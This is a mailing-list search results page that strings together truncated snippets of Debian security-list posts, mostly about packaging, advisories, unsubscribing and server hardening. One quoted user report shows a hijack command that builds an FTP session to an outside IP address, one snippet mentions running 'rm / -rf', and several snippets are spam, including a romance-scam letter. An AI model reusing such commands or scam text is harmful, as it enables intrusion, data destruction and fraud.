Hi Team!
My name is David Polverari, and I work with offensive security in the
Brazilian Army. I have worked with and been mentored by both Eriberto
and Thiago Andrade, and for the last two years I have maintained my own
packages as a DM [1], and recently have become a DD.
I have already
Hello Eriberto,
Thanks for uploading!
Regards,
David
On Fri, Apr 30, 2021 at 11:42:15PM -0300, Eriberto wrote:
> Hi David,
>
> I just uploaded firewalk. Thanks for your work.
>
> Regards,
>
> Eriberto
Hello team,
I'm looking for a sponsor for a new package, firewalk [1]. Currently, it
is a Kali-specific package [2].
Please, could you review it and upload it to experimental? Thanks.
[1] https://salsa.debian.org/pkg-security-team/firewalk
[2] http://pkg.kali.org/pkg/firewalk
Regards,
--
David
trabackup/pull/266
<https://github.com/percona/percona-xtrabackup/pull/266>
https://github.com/percona/percona-xtrabackup/pull/267
<https://github.com/percona/percona-xtrabackup/pull/267> ( If the intent is to
backport the fix rather than jump the version ).
Cheers
David
David Busby,
volved as you can bootstrap
from basically any system – getting apt to run on any system while not
entirely impossible is considerably harder and it expects a reasonable
systemstate to work with which a bootstrapping system is not… in
exchange you don't get support for more advanced stuff like Valid-U
Hello,
You need to send a mail to debian-security-requ...@lists.debian.org with
"unsubscribe" as subject.
You can also unsubscribe for some list here :
https://www.debian.org/MailingLists/unsubscribe
Best regards
Le 31/03/2016 16:42, Tiffany Ryan a écrit :
>
> Please remove my email from you
for identification. More info on requesting CPEs here:
https://nvd.nist.gov/cpe.cfm
I thought I'd raise the idea. Thanks!
--- David A. Wheeler
signature.asc
Description: signature.asc
Hello,
You can follow instructions on this URL:
https://www.debian.org/MailingLists/#subunsub
Or use this form : https://www.debian.org/MailingLists/unsubscribe
Good bye
Le 11/01/2016 00:04, David ISIDORE a écrit :
> Hi, I'm not on Debian anymore. How can I unsubscribe from mailing l
Hi, I'm not on Debian anymore. How can I unsubscribe from mailing list?
2016-01-10 20:08 GMT+01:00 Michael Gilbert :
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA512
>
> - -
> Debian Security Advisory
Bonaccorso
Sent: Wednesday, 11 November 2015 4:52 PM
To: David McDonald <david.mcdon...@semagroup.com.au>
Cc: 'debian-security@lists.debian.org' <debian-security@lists.debian.org>
Subject: Re: [SECURITY] [DSA 3386-2] unzip regression update
Hi Dave,
On Tue, Nov 10, 2015 at 09:54:19PM
rom: Salvatore Bonaccorso [mailto:salvatore.bonacco...@gmail.com] On Behalf Of
Salvatore Bonaccorso
Sent: Tuesday, 10 November 2015 8:46 PM
To: David McDonald <david.mcdon...@semagroup.com.au>
Cc: 'debian-security@lists.debian.org' <debian-security@lists.debian.org>
Subject: Re: [SE
Hi Salvatore,
Your e-mail below states:
"For the stable distribution (jessie), this problem has been fixed in
version 6.0-16+deb8u2" (Note bene the last digit)
However, https://www.debian.org/security/2015/dsa-3386 states:
"For the stable distribution (jessie), these problems
Unsubscribe
On 20 May 2015 at 05:37, David Prévot da...@tilapin.org wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
- -
Debian Security Advisory DSA-3265-1 secur...@debian.org
http
Hallo Günter
Ich bim Stv. Security (bis Salvatore wieder da ist).
Könntest Du prüfen, ob wir davon betroffen sind (s.u.)?
Gruss
David Schneider
On 02.02.2015 19:50, Sebastien Delafond wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Hello,
Le 19/11/2014 11:49, Yves-Alexis Perez a écrit :
so people are advised to keep kernel
symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by
default on Wheezy
This setting is not set on my Wheezy machine.
How can I set it permanently (i.e. across reboots).
Best
,
david
--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/546caccf.8070...@linux-france.org
after the attack happened with a
new master key that would mean nobody could apt-get the debian-keyring
package for the new public key.
I am wondering if I am missing something. Is there a process for this
possibility?
Thanks
--
David Hubner
Software Engineer
david.hub...@smoothwall.net
Lenny
in its current state. If you need to secure your old boxes you will have to
look for alternative methods outside of supported packages. Think about
improved firewalling.
What attack vectors of the shellshock exploit are worrying to you?
Regards,
David
2014-10-01 13:45 GMT+02:00 Nikolay
With Qmail exposed and being an attack vector I would advice to build your
own updated bash package.
You wont get official security updates.
2014-10-01 14:06 GMT+02:00 Nikolay Hristov ge...@stemo.bg:
On 10/01/2014 02:58 PM, Konstantin Khomoutov wrote:
On Wed, 1 Oct 2014 14:45:55 +0300
Also about not thrusting people, you are sending to this list with your
company email address and tell everyone here you have an exploitable qmail
setup running. Be carefull with the information you make public.
Regards,
David
2014-10-01 14:17 GMT+02:00 David Dejaeghere david.dejaegh
coordination, or
even i18n help if needed) if you wish to.
Regards
David
signature.asc
Description: OpenPGP digital signature
?
Not restarting by default the DM seems to be nice thing to have.
How does it work if the upgrade run in the background? Will all needed
service be restarted without asking? (If so, the gdm3 restart issue may
be a blocker).
Regards
David
signature.asc
Description: OpenPGP digital signature
Le 07/09/2014 10:54, Paul Wise a écrit :
On Sun, Sep 7, 2014 at 9:30 PM, David Prévot wrote:
How does it work if the upgrade run in the background? Will all needed
service be restarted without asking? (If so, the gdm3 restart issue may
be a blocker).
Not sure what you mean
Regards
David
signature.asc
Description: OpenPGP digital signature
Le 26/06/2014 16:06, Jason Fergus a écrit :
Ha ha, made me laugh.
Speaking of lists, I wish I knew how Evolution knows to ask if one would
like to reply to the list or the sender. My work uses a bunch of
mailing lists, and I always feel like I'm breaking list etiquette when I
have to do a
Le 30/05/2014 21:30, Joey Hess a écrit :
Alfie John wrote:
Taking a look at the Debian mirror list, I see none serving over HTTPS:
https://www.debian.org/mirror/list
https://mirrors.kernel.org/debian is the only one I know of.
It would be good to have a few more, because there are
Le 30/05/2014 22:02, Henrique de Moraes Holschuh a écrit :
On Fri, 30 May 2014, Erwan David wrote:
Le 30/05/2014 21:30, Joey Hess a écrit :
Alfie John wrote:
Taking a look at the Debian mirror list, I see none serving over HTTPS:
https://www.debian.org/mirror/list
https
Le 17/05/2014 18:38, Jan Moskyto Matejka a écrit :
I might be misinterpreting your definition of meaningful, but I
have been looking for a public entropy source for my Debian system
for quite a while. If you can point me to the Debian equivalent of
pollinate and https://entropy.ubuntu.com/
On Wed, Jan 22, 2014 at 02:33:27PM CET, Nico Angenon n...@creaweb.fr said:
no output
Thanks for all...
Nico
You may also try lsof -i udp:10001
Launch it as root, because a normal user cannot see the descriptors of
processes owned by others.
--
To UNSUBSCRIBE, email to
On 13Nov27:2356+1100, Scott Ferguson wrote:
On 27/11/13 23:37, David L. Craig wrote:
On 13Nov27:1423+1100, Scott Ferguson wrote:
On 27/11/13 13:49, David L. Craig wrote:
On 13Nov26:1545-0500, David L. Craig wrote:
On 13Nov26:1437-0500, Mark Haase wrote:
Therefore, a Linux
On 13Nov26:1437-0500, Mark Haase wrote:
Therefore, a Linux distribution has 2 choices: (1) wait for upstream
patches for bugs/vulnerabilities as they are found, or (2) recompile all
packages with optimizations disabled. I don't think proposal #2 would get
very far...
Well, there's always -O1
On 13Nov26:1545-0500, David L. Craig wrote:
On 13Nov26:1437-0500, Mark Haase wrote:
Therefore, a Linux distribution has 2 choices: (1) wait for upstream
patches for bugs/vulnerabilities as they are found, or (2) recompile all
packages with optimizations disabled. I don't think proposal
Salvatore Bonaccorso car...@debian.org wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
- -
Debian Security Advisory DSA-2758-1 secur...@debian.org
http://www.debian.org/security/
I hope that is a golden ticket. I want to visit the chocolate factory!
2013/3/20 Mythic Beasts supp...@mythic-beasts.com
Thank you for your mail to Mythic Beasts Support. Your query has been
received, and we will respond shortly. Please preserve the case number
in the subject line of any
On Fri, Feb 08, 2013 at 02:06:48PM CET, Daniel Curtis sidetripp...@gmail.com
said:
Hi Mr Erwan
So, everything is okay? Even these strange logs
mentioned earlier? I'm still curious about this rule;
SYN,RST, ACK,FIN, PSH,URG, SYN,RST,ACK,
FIN,PSH,URG
What do you mean by writing, that I
Le 07/02/2013 19:34, Daniel Curtis a écrit :
Hi
Thank you all for your answers. They are very helpful.
I have to mention some thing, which I forgot to write;
* no running services
* all ports are closed (according to e.g. nmap)
* iptables has concerning rules about /INVALID/ packets
*
Le 07/02/2013 21:22, Daniel Curtis a écrit :
Hi,
//(...)/Nothing that should bother you.
/
Okay, so far so good. But what about the rest of
IP addresses, which occurred in logs? You have
mentioned about a /bendel.debian.org http://bendel.debian.org/ website.
I wonder why?
Because that's the
Hi,
Le 14/09/2012 01:47, Thijs Kinkhorst a écrit :
On Fri, September 14, 2012 03:28, David Prevot wrote:
This is a notice to inform you, that our previous PGP/GPG key expired.
Thanks for notifying us on debian-security-announce@l.d.o, but I
disagree that such an announcement deserves a DSA
announcement.
Regards
David
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)
iQIcBAEBCAAGBQJQUoguAAoJELgqIXr9/gny8xEP/jT7oCPsYppRuK5nsD5Mjg5K
qPE8R6JZM/98okBQGmRE8X8kSC6Iz08+bwN11SfoBqw3j3mrZCEMUQG244oMnW3L
I02Qq0s9ixwBCnPHGlLCn5R5tVjv9G5DcG4DkHNVBQb9BphL9hJxHSwAxBf5/yPH
EW8sHJ
memory isn't entirely failing me
[…]
16:46 adsb at least the multi-archive changes mean the upload
signature is now only checked once, so the key expiry foo goes away
Regards
David
-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (500, 'unstable'), (500
On Thu, Aug 16, 2012 at 11:37:09AM CEST, Thijs Kinkhorst th...@debian.org
said:
Hi Adam,
On Thu, August 16, 2012 07:56, echo083 wrote:
The sun-java6 in the stable branch is the version 1.6.0_26 is there a
plan for any security upgrade ?
I'm afraid that's not possible. Oracle has
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Le 08/08/2012 20:25, Mike Mestnik a écrit :
On 08/06/12 22:47, maestro wrote:
#please unsubscribe me from this list
# i do not find any link to do so.
# thank you.
Instructions can be found at the bottom, there is no link or URL.
Actually,
of DKMS?
How are you balancing the convenience (now sometimes need) of DKMS vs
the risk of having compliers on servers?
If your saying no, how are you getting the modules onto your secure
systems?
If this is a solved issue could you direct me to good documentatin?
Thanks!
David
Thanks for your hint, Javier (author of the script used to generate
those) and the security team CCed to gather more information.
Regards
David
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAEBCAAGBQJOlHEAAAoJELgqIXr9/gnys3oP/3HNW18rC4fNT8E9Ixrs3JIw
4NhzqFC4dd35M
On 05/10/11 19:13, wer...@aloah-from-hell.de wrote:
Hi all,
a Debian LTS-Version would be so welcome and is definitly something that's
missing for Debian.
best,
Werner
Isn't it called stable ?
--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of
On 06/10/11 00:13, Sythos wrote:
On Wed, 05 Oct 2011 19:13:33 +0200
wer...@aloah-from-hell.de wrote:
Hi all,
a Debian LTS-Version would be so welcome and is definitly
something that's missing for Debian.
in 18 years Debian released 6 stable, an avarage of 3 years between a
stable
: Draft for apps for twitter
===8==Original message text===
Hello David,
Timeframe is 3 weeks. It's possible to discuss a budget next week with skype,
Please try to ask the following icon designer:
debian-security@lists.debian.org
===8===End of original message
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Are we going to receive those every time he is out of the office? I hope
someone will do something about it...
On 2011-08-21 16:17, Steven Bownas wrote:
I am out of the office until 09/06/2011.
I will be out of the office from Mon Aug 22 through
On Fri, Mar 11, 2011 at 04:08:29PM CET, Mike! nibl...@gmail.com said:
On 03/11/2011 04:06 PM, Jordon Bedwell wrote:
On 3/11/2011 9:04 AM, Andrey Rahmatullin wrote:
On Fri, Mar 11, 2011 at 09:42:17AM -0500, hans wrote:
rm / -rf worked fine last time I tried it on a VM as an experiment.
It was
Thanks in advance if you could fix this.
Regards
David
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAEBCAAGBQJNcY+AAAoJELgqIXr9/gnykEgQALEm6jwCTY2kwjFs7DnJfa3H
jqJ3HCk/HpRbaG+PIezrb83+jyg3Ahnv4IgvXa7QrSblcnz7+cBrdJmfH+cYaiAp
5QJ+KtB3rYbpyKzyecmV9sEnMhjN6C5YL8wyy
it easier to read in future)
Thank you,
David
--
. ''`. Debian developer | http://wiki.debian.org/DavidPaleino
: :' : Linuxer #334216 --|-- http://www.hanskalabs.net/
`. `'` GPG: 1392B174 | http://deb.li/dapal
`- 2BAB C625 4E66 E7B8 450A C3E1 E6AA 9017 1392 B174
diff --git a/debian
video aula online download de video aulas:
Visite: http://www.cursoemvideoaulas.com
download video aulas cursos a distancia online, video aula online download de
video aulas, aulas canto aula violino, como fazer sushi video dança, video aula
guitarra video dança do ventre, aula video direito
, and I believe I am worth to find my happiness here.
I hope after reading this letter you are still interested in me:) I will
be waiting for your answer! Please write me on this address:
drthressydav...@yahoo.com
I love you so much,
Dr Thressy David
if this has been addressed? Are there any plans to do
so?
Thanks!
--
David Ehle
Computing Systems Manager
CAPP CSRRI
rm 077
LS Bld. IIT Main Campus
Chicago IL 60616
[EMAIL PROTECTED]
312-567-3751
He who fights with monsters must take care lest he thereby become a
monster. And if you gaze
.
--
David Ehle
Computing Systems Manager
CAPP CSRRI
rm 077
LS Bld. IIT Main Campus
Chicago IL 60616
[EMAIL PROTECTED]
312-567-3751
He who fights with monsters must take care lest he thereby become a
monster. And if you gaze for long into an abyss, the abyss gazes also into
you.
On Tue, 29 Apr 2008
Please take this discussion off list. It has nothing to do with security.
Take it to some list that has has to do with debian policy, announcements,
the web-page or anyplace else where it might be relevent.
Great job Security team. Thanks for all your work.
--
David Ehle
Computing Systems
Moe sir what is the code for the phone I'm havin a brain fart
-Original Message-
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
[EMAIL PROTECTED]
BCC: David Nowak [EMAIL PROTECTED]
Creation Date: 1/29 1:04 pm
Subject: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages fix several
would ask for a
password every time you would want to delete a file.
To my knowledge, today the only way of protecting files in a similar way is to
create different user profiles with different permissions.
Hope you will take my suggestion into account.
Regards,
David
, research leads,
or input from those who have put together similar projects.
Thanks in Advance!
David.
--
David Ehle
Computing Systems Manager
CAPP CSRRI
rm 077
LS Bld. IIT Main Campus
Chicago IL 60616
[EMAIL PROTECTED]
312-567-3751
He who fights with monsters must take care lest he thereby become
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
Hello,
Recently I'm repeatedly being pestered by a strange event while surfing the
net. My cursor is taken over and the following code is typed:
%systemroot%\system32\cmd.exe
cmd /c echo open 59.31.153.120 22783 ik echo user db
On Tue, 2006-10-10 at 02:12 +0200, Joerg Jaspert wrote:
On 10802 March 1977, Florent Rougon wrote:
...
2. I have to trust the integrity of db.debian.org.
Signing the keys you would have to trust whoever signed it. Same thing.
I don't see that as being the same thing at all. Without
On Tue, 2006-10-10 at 21:57 +0200, Florent Rougon wrote:
[ I think debian-admin have read enough about my request by now, so if
you reply about verifying certificates and such, please consider
dropping the CC. Thanks. ]
Kurt Roeckx [EMAIL PROTECTED] wrote:
See:
On Tue, 2006-10-10 at 22:24 +0200, Joerg Jaspert wrote:
On 10803 March 1977, Kurt Roeckx wrote:
I assume you've used https and that you verified the certificate?
And saw that it was issued by SPI? And then you looked up SPI's
certificate? And you found that there is a text file with
+a1A1Bu9FvJ2AH1d6a
D/j/V2QpP54=
=AVqq
-END PGP SIGNATURE-
--
Regards,
/\
David Kennedy CISSP \ / ASCII Ribbon Campaign
Protect what you connect; X Against HTML Mail
Look both ways before crossing the Net
with:
Sep 9 00:28:15 stan named[5638]: couldn't open pid file
'/var/run/bind/run/named.pid': Permission denied
Sep 9 00:28:15 stan named[5638]: exiting (due to early fatal error)
I just had to change the 'bind' users group to the new bind group.
Dave,
--
David Broome Sr. Programmer Analyst
.
So, I would be interested in hearing what the additional security
implications would be.
David.
--
David Ehle
Computing Systems Manager
CAPP CSRRI
rm 077
LS Bld. IIT Main Campus
Chicago IL 60616
[EMAIL PROTECTED]
312-567-3751
He who fights with monsters must take care lest he thereby become
Wir verwenden glaub ich immer die aktuellste stable version.
Lg.
D
-Ursprüngliche Nachricht-
Von: Martin Schulze [mailto:[EMAIL PROTECTED]
Gesendet: Montag, 01. Mai 2006 06:38
An: Debian Security Announcements
Betreff: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary
On Tue, 2006-04-18 at 17:39 +0400, Adarsh V.P wrote:
hi
i am using hylafax with debian sarge.I can only use the fax
utilites(sendfax,faxstat,...) while logging in as root.
Access is denied while trying to connect to the hylafax server from clients.
i just made a module called hylafax and
-Mensaje original-
De: Martin Schulze [mailto:[EMAIL PROTECTED]
Enviado el: miércoles, 15 de marzo de 2006 9:43
Para: Debian Security Announcements
Asunto: [SECURITY] [DSA 1002-1] New webcalendar packages fix several
vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
On Fri, 2006-03-03 at 13:01 -0700, Michael Loftis wrote:
--On March 3, 2006 10:01:54 AM -0800 Zakai Kinan [EMAIL PROTECTED]
wrote:
I just installed a server with sarge 3.1 and after
testing it with nessus it is vulnerable to bonk. I am
trying to figure out how that is possible and
Hej, jag har julledigt, och kommer inte tillbaka förrän måndagen den 2:a
januari.
För installationsärenden, maila [EMAIL PROTECTED] eller ring payread på 08-20
83 70
Med vänliga hälsningar,
David Ahlard
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble
On Thu, 2005-10-13 at 01:28 +0200, Peter Palfrader wrote:
On Tue, 11 Oct 2005, Benjamin Maerte wrote:
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]
Learn to read the mails you're replying to, will you?
Peter
On Thu, 2005-09-22 at 04:40 +1000, Arvind Autar wrote:
Helllo,
I have been using debian for quite some time now, how ever I have
watched several distrobutions implentating so many great ideas, and I
have been wondering why such a robust distorbution as debian
GNU/Linux(*) hasn't done this.
their system offline and not put the
security line in their sources- as security will require changes at some
level.
I support introducting new packages when older versions can not be
realisticly maintained with backported security fixes.
--
David Ehle
Computing Systems Manager
CAPP CSRRI BIOCAT
rm 077
On Tue, 23 Aug 2005, Matt Zimmerman wrote:
On Tue, Aug 23, 2005 at 12:04:17PM -0500, David Ehle wrote:
As you can see in the subject, the OP understands the policy, but believes
it should be changed.
To what? The suggestions that I have seen so far seem to be reiterations
I second this post.
Dan, Thank you for saying so clearly.
On Sat, 20 Aug 2005, Daniel Sterling wrote:
Keeping Debian stable by not changing things is great.
Except maybe its not so great when you're trying to maintain a complicated,
buggy, high profile program that handles sensitive user
have servers that can
be used to build at least two of the architectures.
David.
--
David Ehle
Computing Systems Manager
CAPP CSRRI
rm 077
LS Bld. IIT Main Campus
Chicago IL 60616
[EMAIL PROTECTED]
312-567-3751
He who fights with monsters must take care lest he thereby become a
monster
fashion, and the
situation either not be resolved or we do something stupid like drop
mozilla.
Just for the record I also vote against volitol. Security changes should
go into stable proper.
david.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL
Despite of the fact, the the release is probably unable to match the mozilla
release cycles - do you really think, mozilla is the one and only package,
debian is all about? Well, I mean the killer application, the thin that
justify Debian?
Keep smiling
yanosz
For my end users, who have
systems. Debian is MY opinion is as much a desktop distro as
it is a server distro, and support for both is equally important.
David.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
release of stable.
Does anyone know what generated the above log entries? And why is there no ip?
Regards,
David.
--
.''`. David Ramsden [EMAIL PROTECTED]
: :' :http://david.hexstream.co.uk/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
`- Debian - when my girlfriend's away
On Fri, Jun 17, 2005 at 10:47:49PM +0200, Marcin Owsiany wrote:
On Fri, Jun 17, 2005 at 07:33:02PM +0100, David Ramsden wrote:
Does anyone know what generated the above log entries?
try:
find /usr/sbin /sbin /usr/local/sbin \
/usr/bin /usr/local/bin /bin /usr/lib /lib -type f
www.shwpvragelsh7ta.aladfala9.com
ranimé pour devant promenasses, devant. marrerez extérioriserons
septentrionales sous exaucerions le sans pénètrent les désenivrâtes.
sans doserez les corroborassions mais réclamassions sucrer au-dessus ce
amoncellerais coulée sans déterminassions.
devant
even if you check debian security advisories diligently.
--
David Stanaway [EMAIL PROTECTED]
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
On Mon, 2005-05-09 at 07:30 -0700, JM wrote:
I guess what I was trying to say
should not this directory be owned by root and with a 755 permissions?
Default debian permissions on /usr/local are:
drwxrwsr-x 11 root staff 115 2005-03-23 13:42 local
-davidc
--
It is not the mountain we
There is really no excuse for such egregious cross posting. Please send
questions to apppropriate mailing lists only, preferably one at a time.
On Wed, 2005-04-27 at 15:58 -0300, Servilink Santiago Francos wrote:
Hello, I have a server and I changed the ip number of the server and
the
Over the last few days, I've seen the following type of entry in my
snort report:
The distribution of event methods
===
%# of method
===
5.81 5 (portscan) TCP Portsweep
3
On Wed, 2005-03-30 at 17:55 +1000, Andrew M.A. Cater wrote:
On Tue, Mar 29, 2005 at 05:08:32PM -0500, Noah Meyerhans wrote:
On Wed, Mar 30, 2005 at 07:16:31AM +1000, David Pastern wrote:
And this, in reality, is why Woody is so old. I cannot imagine any
other distro providing
On Wed, 2005-03-30 at 20:34 +1000, Matthew Palmer wrote:
On Wed, Mar 30, 2005 at 07:02:55PM +1000, David Pastern wrote:
Redhat/Fedora/Suse/Mandrake are just plain silliness. However - there
is a big difference between a one year release cycle, and the fact that
it's been nearly 3 years
On Wed, 2005-03-30 at 21:35 +1000, Ivan Brezina wrote:
Let me point, that meanig of word stable is differnet for RedHat/SUSE.
Debian stable is more like frozen - no bugfixes, no new drivers
no new features. Just security fixes a and some critical fixes.
RedHat stable is more like solid
On Tue, 2005-03-29 at 15:25 -0500, Noah Meyerhans wrote:
On Tue, Mar 29, 2005 at 01:38:55PM +0100, Simon Heywood wrote:
Sorry, but this isn't correct. kernel 2.4.18-1 in woody is patched
against known vulnerability.
The security team have quietly stopped updating it, preferring to
On Tue, 2005-03-29 at 07:25 +1000, Malcolm Ferguson wrote:
Thanks for all the feedback everybody. It looks like an ssh dictionary
attack discovered a weak password, followed by a local root exploit
against an out-of-date kernel. From now on I will be sticking with an
official Debian
with input and output.
http://people.debian.org/~skx/2005/
Nice script. I fixed it up to sanitise 'sanitizations' and sort output by
count. diff attached.
Regards, David
--
- hallo... wie gehts heute?
- *hust* gut *rotz* *keuch*
- gott sei dank kommunizieren wir über ein septisches medium
Alvin Oga wrote:
ah .. good point ... i make no distinction between local access
vs physical access in that if the server is behind the locked
door, it'd be better than if its on the corp server in the next
open cubicle on the same cat 5 wires, hubs and switches etc
Physical access means they
s. keeling wrote:
Do you understand what anyone can see anything really means? Have
you pumped tcpdump output into ethereal lately?
anyone can see anything really means anyone can see anything.
Think about it. And what's the real reason why you don't want to
bother with sudo?
I'm curious,
s. keeling wrote:
... should be != are. Are you sure no-one there's using telnet,
ftp, etc?
If they send their confidential data unencrypted, that's not my fault, and
there's not much I can do to stop them (even if I somehow make it impossible on
my computers, they could still go to a library
s. keeling wrote:
Isn't it generally accepted that black hats who get local access (ie.,
a user login account) is _much_ worse than black hats who've been kept
out? Assuming black hat wants root, taking over a user's account is a
very big first step.
I would take the security of your user's
Alvin Oga wrote:
no more telnet, no more pop3, no more wireless, no more
anything that is insecure
Those are not insecure: using them unwisely is. Telnet over a VPN is just as
secure as ssh with password authentication. The same goes for pop3/pop3s.
Wireless is completely different
Hi
I also use rkhunter and have noticed this. Before I upgraded to rkhunter
1.1.9 I used 1.1.8 and used to get a different message when it does an
application version scan, it used to moan and say that I have vuln
packages when I'm pretty sure I didn't as I ran security
updates/upgrades everyday
archives at lists.ubuntu.com for the Scary .desktop behaviour thread.
I was pondering complicated solutions with alternate stream hacks (like
XPSP2 uses), but your suggestion is much simpler and would require
minimal changes to the system.
On Wed, 2005-01-19 at 06:52 -0500, David Mandelberg
1 - 100 of 397 matches
Mail list logo